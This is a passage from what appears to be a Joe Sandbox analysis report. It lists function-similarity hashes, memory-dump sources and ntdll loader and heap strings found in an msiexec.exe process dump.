                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-4253913091
                                            • Opcode ID: 838df8eaff27ca595f9a1f6623e97f7bc1a448728a9dc2504c3030c5a969418b
                                            • Instruction ID: 6478116719c3a2f4dcbf65560593765dc75d9185374509f362e8bdbbfcc3b6b0
                                            • Opcode Fuzzy Hash: 838df8eaff27ca595f9a1f6623e97f7bc1a448728a9dc2504c3030c5a969418b
                                            • Instruction Fuzzy Hash: 25F17A30A20609DFE716CF68C890F6ABBF5FF45704F1082A8E5569B385D774AA81CF90
                                            Strings
                                            • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 24851728
                                            • HEAP: , xrefs: 24851596
                                            • HEAP[%wZ]: , xrefs: 24851712
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                            • API String ID: 0-3178619729
                                            • Opcode ID: 5a60b93d446e3159771a23b3b9cc064fa822db90a27ef3754f16f1a83667df2c
                                            • Instruction ID: c23418c0779e96f3abbfd4e7107f47c73354c9d92779e4378ccf70d83bc3fb98
                                            • Opcode Fuzzy Hash: 5a60b93d446e3159771a23b3b9cc064fa822db90a27ef3754f16f1a83667df2c
                                            • Instruction Fuzzy Hash: 17E12131E24285DFDB16CF68C490B7ABBF1EF48300F158A9DE9968B256E774E940CB50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                            • API String ID: 0-1145731471
                                            • Opcode ID: 199dcaec164daa2da4a51bb93354ce5ca838e8ce1e7b61ca22a3587d6e3f849f
                                            • Instruction ID: 70c766626d600e85d1c65b2d7068271839c8280d5af922982490c2fe118f3070
                                            • Opcode Fuzzy Hash: 199dcaec164daa2da4a51bb93354ce5ca838e8ce1e7b61ca22a3587d6e3f849f
                                            • Instruction Fuzzy Hash: 29B1DE71A24609DFDB16CF68C880F9DBBB2BF54310F154A29E991EB394D7B0E940CB41
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                            • API String ID: 0-2391371766
                                            • Opcode ID: 8d7d27b1b4e692cf1b656abd42ccbc2ad83dc8eb7c700724e5e2a264f5babb6c
                                            • Instruction ID: b8349c47db58a4c7ad986cc515bb5b7a9a2944a0976b52f9087b683514c7d9b0
                                            • Opcode Fuzzy Hash: 8d7d27b1b4e692cf1b656abd42ccbc2ad83dc8eb7c700724e5e2a264f5babb6c
                                            • Instruction Fuzzy Hash: 00B1837262A745EFE311CF64C880F5BBBE8EB44754F004A29FA50AB254D7B4ED44CB92
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                            • API String ID: 0-318774311
                                            • Opcode ID: 3b412893cbe5d15353e049de0dc3027fdfbb50f62468e82a1caa9d0800afdc60
                                            • Instruction ID: f7e41823efb85d5dc36bdd1e982a74e42794872008212f5f4434b9d0eff9fbea
                                            • Opcode Fuzzy Hash: 3b412893cbe5d15353e049de0dc3027fdfbb50f62468e82a1caa9d0800afdc60
                                            • Instruction Fuzzy Hash: 65816C71729345EFE311CB15C840F6ABBE8EF86750F000A69BA989B390D7B4DD04CB52
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                            • API String ID: 0-3870751728
                                            • Opcode ID: 707d7ab636133be8753d018cd25bd6be89600b03a87a9052ded9af004ef42f4c
                                            • Instruction ID: 686f4476ba440439fc57e0c4f21a815a6af12772504f3d7e475a32c28e3839fe
                                            • Opcode Fuzzy Hash: 707d7ab636133be8753d018cd25bd6be89600b03a87a9052ded9af004ef42f4c
                                            • Instruction Fuzzy Hash: 0D915AB1E11609DFEB14CF69D880B9DBBF1BF48304F14826AE905AB395E7759842CF50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                            • API String ID: 0-373624363
                                            • Opcode ID: 07ccd7e4d83682b3df2b0019c744d8cbbd1253e478cb7c6a8b4e8bf1db2df5bd
                                            • Instruction ID: d74f2ee1cbab08393e22d097450abc2f7417e33f03b6d8abf9e72371ff9edd32
                                            • Opcode Fuzzy Hash: 07ccd7e4d83682b3df2b0019c744d8cbbd1253e478cb7c6a8b4e8bf1db2df5bd
                                            • Instruction Fuzzy Hash: FA91D0B1E25649CFDB15CF58C850BAE7BB0FF20354F164395E951AB3A0D7B89A80CB90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %$&$@
                                            • API String ID: 0-1537733988
                                            • Opcode ID: 964553c919bd907720b53ee6148fd139327f83fdccbf41a22bfce5bc73cae199
                                            • Instruction ID: f06081f119963f8f2e57696eab0e3e991838606731a5558433ff4b4c8d8843a2
                                            • Opcode Fuzzy Hash: 964553c919bd907720b53ee6148fd139327f83fdccbf41a22bfce5bc73cae199
                                            • Instruction Fuzzy Hash: 0771CC70628309DFD705CF24C988A0BBBE5BF98718F108B5DF5A987691C770EA05CB92
                                            Strings
                                            • TargetNtPath, xrefs: 2492B82F
                                            • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 2492B82A
                                            • GlobalizationUserSettings, xrefs: 2492B834
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                            • API String ID: 0-505981995
                                            • Opcode ID: 3262438d5459833021651a8282fc2b6123863f36f0a2957f874a8a878c90a448
                                            • Instruction ID: bce27762d880521a2f0f0b377764e46574dc0f6f9a8021a7216dbba2b96443ba
                                            • Opcode Fuzzy Hash: 3262438d5459833021651a8282fc2b6123863f36f0a2957f874a8a878c90a448
                                            • Instruction Fuzzy Hash: A9619F76911A2CAFDB21DF64CC88B99BBF8AF14714F0102E5E609A7254C7749E80CF90
                                            Strings
                                            • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 248AE6C6
                                            • HEAP: , xrefs: 248AE6B3
                                            • HEAP[%wZ]: , xrefs: 248AE6A6
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                            • API String ID: 0-1340214556
                                            • Opcode ID: f1329af8ec2146e358bb50f3dd3d997e3636b7b9ff13b018dd49688df7bcb8cc
                                            • Instruction ID: b3993f3c18706c81e106b8bb9d6670e4e4fde3389b5afbd8c6bcb509453745c9
                                            • Opcode Fuzzy Hash: f1329af8ec2146e358bb50f3dd3d997e3636b7b9ff13b018dd49688df7bcb8cc
                                            • Instruction Fuzzy Hash: 3D514E31760648EFE312CBA8C894F56BBF8FF05350F0446A4E692DB692D3B4EA40DB10
                                            Strings
                                            • LdrpCompleteMapModule, xrefs: 248BA590
                                            • minkernel\ntdll\ldrmap.c, xrefs: 248BA59A
                                            • Could not validate the crypto signature for DLL %wZ, xrefs: 248BA589
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                            • API String ID: 0-1676968949
                                            • Opcode ID: 186aae7b7dbaa8934a50fe0632323e3ad2b4d06d575fa5f0b5e2ec0990521f49
                                            • Instruction ID: 10999348e2907dc2ed2d9fcaad5397fe3a5580a774b6daff04d88b35650ddc95
                                            • Opcode Fuzzy Hash: 186aae7b7dbaa8934a50fe0632323e3ad2b4d06d575fa5f0b5e2ec0990521f49
                                            • Instruction Fuzzy Hash: 7A51F074620745DFE712CB68C9A0B2A7BF4AB00754F144394EA919BBEAD7B4EE40C740
                                            Strings
                                            • minkernel\ntdll\ldrinit.c, xrefs: 248C82E8
                                            • Failed to reallocate the system dirs string !, xrefs: 248C82D7
                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 248C82DE
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1783798831
                                            • Opcode ID: 465650dc75f84e8d645e49711fa354f8ca1fce48daf150def73392ccd5ebd611
                                            • Instruction ID: 56fff9ebcf5e0e6791980d4459188222d57ed19f04b581f971201f123784aaa0
                                            • Opcode Fuzzy Hash: 465650dc75f84e8d645e49711fa354f8ca1fce48daf150def73392ccd5ebd611
                                            • Instruction Fuzzy Hash: A141C3B156A304EBD721EB78C844B4B7BE8EF55654F00462AFA44E7259E778D800CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                            • API String ID: 0-1151232445
                                            • Opcode ID: 070d96c03204774fc56dec8ab1734f96e7facc7e66a1f36933f3451ac81c3b53
                                            • Instruction ID: c4d9aad0dbbfaba31cea42adf33a9009e275e758d8d403334468d0665d6cc64c
                                            • Opcode Fuzzy Hash: 070d96c03204774fc56dec8ab1734f96e7facc7e66a1f36933f3451ac81c3b53
                                            • Instruction Fuzzy Hash: 134166B0B30B98CFEB1ADF5CC090F6A7BE29F05344F1447A9D9458BA46D6B4D886CB11
                                            Strings
                                            • LdrpAllocateTls, xrefs: 248C1B40
                                            • minkernel\ntdll\ldrtls.c, xrefs: 248C1B4A
                                            • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 248C1B39
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                            • API String ID: 0-4274184382
                                            • Opcode ID: 8aee1a3856d2b7e54dd61c65846e6bdb5950431394bae61c9a7eeb1ab797a129
                                            • Instruction ID: 169e3006f58649fc08f45497424db8c50b5cd5a87ace512ed4a71ac4593163f4
                                            • Opcode Fuzzy Hash: 8aee1a3856d2b7e54dd61c65846e6bdb5950431394bae61c9a7eeb1ab797a129
                                            • Instruction Fuzzy Hash: 0D417F75A20609DFDB16CFA9C880BADBBF5FF58714F008259E505A7218DBB5A840CF90
                                            Strings
                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 248D4888
                                            • LdrpCheckRedirection, xrefs: 248D488F
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 248D4899
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 0-3154609507
                                            • Opcode ID: 22a067bdfe872f46fcb48bf8b004f9eca13dad49cb2c0d4dc43522f72ae4db7d
                                            • Instruction ID: 74497c8b7c488b19eb4c4e27df107c6434dcb4e4873dcd6dfbd6a59412dbd563
                                            • Opcode Fuzzy Hash: 22a067bdfe872f46fcb48bf8b004f9eca13dad49cb2c0d4dc43522f72ae4db7d
                                            • Instruction Fuzzy Hash: 87419D33A26694DFCB19CE79C840A167BE5EF89E90F0107A9ED88A7311D731D800DB91
                                            Strings
                                            • GlobalFlag, xrefs: 248DB68F
                                            • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 248DB632
                                            • @, xrefs: 248DB670
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                            • API String ID: 0-4192008846
                                            • Opcode ID: 438b430401f2f796734938feffa9e8c78bb142d2f29e0922b18a31c7707eb471
                                            • Instruction ID: 0a1aab5efda54b21a01f149dd2008aa4785df9a76652636941ec2a8e7f354f54
                                            • Opcode Fuzzy Hash: 438b430401f2f796734938feffa9e8c78bb142d2f29e0922b18a31c7707eb471
                                            • Instruction Fuzzy Hash: 40312DB2D11219EFEB10DFA9DC90EEEBBB8EF44744F100569E605A7254DB749E00CBA4
                                            Strings
                                            • LdrpInitializeTls, xrefs: 248C1A47
                                            • DLL "%wZ" has TLS information at %p, xrefs: 248C1A40
                                            • minkernel\ntdll\ldrtls.c, xrefs: 248C1A51
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                            • API String ID: 0-931879808
                                            • Opcode ID: f99f58cb535c8db1ce4edb9321df1d6f7d60cfe365d1a0a115509e615625399a
                                            • Instruction ID: ebfa2a0b35940733fdf472242ad645883da9a87006e3d45305385362733e72b0
                                            • Opcode Fuzzy Hash: f99f58cb535c8db1ce4edb9321df1d6f7d60cfe365d1a0a115509e615625399a
                                            • Instruction Fuzzy Hash: EE310471A24208EBE712CB98CC81F7A7AA8EF51365F040359F641B7194EBB4EE40CB90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Legacy$UEFI
                                            • API String ID: 2994545307-634100481
                                            • Opcode ID: ae720158fcd1f5061de8611088ea4fae8bd85cc30fa689098572845e6079031e
                                            • Instruction ID: f558d185bb40ec7399d96ab164788b4e86e780ff6326512bc56c89d824e281d5
                                            • Opcode Fuzzy Hash: ae720158fcd1f5061de8611088ea4fae8bd85cc30fa689098572845e6079031e
                                            • Instruction Fuzzy Hash: E6614B72E20619DFDB19CFA8C880ABDBBB9FB48700F104269E659EB251DB31D900DB50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$$
                                            • API String ID: 0-233714265
                                            • Opcode ID: 640c7611050eb9f94276ff771db5cc40fb4693db877b0539063043ffaca5a89c
                                            • Instruction ID: 475aab84ba9a3b6c615f9dedb13c3f69ce8948b577c341d350736be05b201d8a
                                            • Opcode Fuzzy Hash: 640c7611050eb9f94276ff771db5cc40fb4693db877b0539063043ffaca5a89c
                                            • Instruction Fuzzy Hash: A861CE71E20649DFEB61CFA8C580B9DBBB1FF44704F0042A9D61BAB645DBB4E941DB40
                                            Strings
                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 2485063D
                                            • kLsE, xrefs: 24850540
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                            • API String ID: 0-2547482624
                                            • Opcode ID: 1ca7165a70308a05164a7672a5e39ae0a0ac1d86ce171185e7c13e735f148f18
                                            • Instruction ID: 20bce5507571f5fc222d2935c8227574ffe0bdd0f8e2f728f400239fbf89c158
                                            • Opcode Fuzzy Hash: 1ca7165a70308a05164a7672a5e39ae0a0ac1d86ce171185e7c13e735f148f18
                                            • Instruction Fuzzy Hash: 4F51CE71524B46CFC324DF68C440797BBE4AF86304F018A3EEAAA97261E774D645CF92
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                            • API String ID: 0-118005554
                                            • Opcode ID: 35bb9400b26a499b97407f384b5f183e87feec2dce4476e318161c611acc979f
                                            • Instruction ID: a930537100fca6e2bf5ece548da2de1bf87f87e8ff656d776d52e0db0efae25d
                                            • Opcode Fuzzy Hash: 35bb9400b26a499b97407f384b5f183e87feec2dce4476e318161c611acc979f
                                            • Instruction Fuzzy Hash: AB319031329781DBD301CB78D854B2ABBE4EF96754F000A69F958CB3A0EBB4D905DB52
                                            Strings
                                            • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 248C2A95
                                            • RtlpInitializeAssemblyStorageMap, xrefs: 248C2A90
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                            • API String ID: 0-2653619699
                                            • Opcode ID: a0c698224e50b68588667cb596313528a889132e9578d91c4ed76a53e019eda4
                                            • Instruction ID: 9ab54fc966d916448252b188c814171facfd6a0631a0691c9a9f4faa0a0b71f8
                                            • Opcode Fuzzy Hash: a0c698224e50b68588667cb596313528a889132e9578d91c4ed76a53e019eda4
                                            • Instruction Fuzzy Hash: 21112C72B21108FBE7258A88DD41F5B7AA99FA4F54F1482697A04DF284D6B5CD40C690
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Cleanup Group$Threadpool!
                                            • API String ID: 2994545307-4008356553
                                            • Opcode ID: 2b358fcfd2d4bc55408fd2859d324942e8517fc5cecf854ba265063064e3e755
                                            • Instruction ID: 32640b9ff75cef636b398c6eef70e8cab8c70e4a1124b1829be89a637f196781
                                            • Opcode Fuzzy Hash: 2b358fcfd2d4bc55408fd2859d324942e8517fc5cecf854ba265063064e3e755
                                            • Instruction Fuzzy Hash: A401ADB2165A48EFE321CF14CD45B167BE8EB44B15F008A39A658C7694E338D804CB4A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
